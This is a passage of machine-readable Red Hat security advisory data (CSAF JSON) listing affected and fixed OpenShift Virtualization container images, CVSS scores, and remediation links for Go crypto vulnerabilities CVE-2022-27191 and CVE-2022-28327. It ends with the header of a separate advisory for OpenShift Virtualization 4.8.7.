"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-27191"
},
{
"category": "external",
"summary": "RHBZ#2064702",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064702"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-27191",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27191"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ",
"url": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ"
}
],
"release_date": "2022-03-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: crash in a golang.org/x/crypto/ssh server"
},
{
"cve": "CVE-2022-28327",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2022-04-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2077689"
}
],
"notes": [
{
"category": "description",
"text": "An integer overflow flaw was found in Golang\u0027s crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: crypto/elliptic: panic caused by oversized scalar",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang \u0026 go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-28327"
},
{
"category": "external",
"summary": "RHBZ#2077689",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077689"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-28327",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28327"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-28327",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28327"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8",
"url": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8"
}
],
"release_date": "2022-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: crypto/elliptic: panic caused by oversized scalar"
}
]
}
rhsa-2022_6890
Vulnerability from csaf_redhat
Published
2022-10-11 16:02
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.8.7 images:
RHEL-8-CNV-4.8
==============
vm-import-controller-container-v4.8.7-4
ovs-cni-marker-container-v4.8.7-6
virt-cdi-apiserver-container-v4.8.7-4
virt-cdi-uploadserver-container-v4.8.7-4
virt-cdi-uploadproxy-container-v4.8.7-4
vm-import-virtv2v-container-v4.8.7-4
hostpath-provisioner-container-v4.8.7-4
ovs-cni-plugin-container-v4.8.7-5
bridge-marker-container-v4.8.7-5
virt-cdi-controller-container-v4.8.7-4
node-maintenance-operator-container-v4.8.7-4
cluster-network-addons-operator-container-v4.8.7-5
cnv-containernetworking-plugins-container-v4.8.7-5
virt-cdi-importer-container-v4.8.7-4
vm-import-operator-container-v4.8.7-4
kubemacpool-container-v4.8.7-5
kubevirt-vmware-container-v4.8.7-4
kubevirt-v2v-conversion-container-v4.8.7-4
kubernetes-nmstate-handler-container-v4.8.7-5
virtio-win-container-v4.8.7-4
kubevirt-ssp-operator-container-v4.8.7-3
virt-cdi-operator-container-v4.8.7-4
cnv-must-gather-container-v4.8.7-4
hyperconverged-cluster-operator-container-v4.8.7-4
virt-cdi-cloner-container-v4.8.7-4
hostpath-provisioner-operator-container-v4.8.7-4
hyperconverged-cluster-webhook-container-v4.8.7-4
kubevirt-template-validator-container-v4.8.7-4
virt-handler-container-v4.8.7-5
virt-api-container-v4.8.7-5
virt-operator-container-v4.8.7-5
virt-launcher-container-v4.8.7-5
virt-controller-container-v4.8.7-5
hco-bundle-registry-container-v4.8.7-28
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
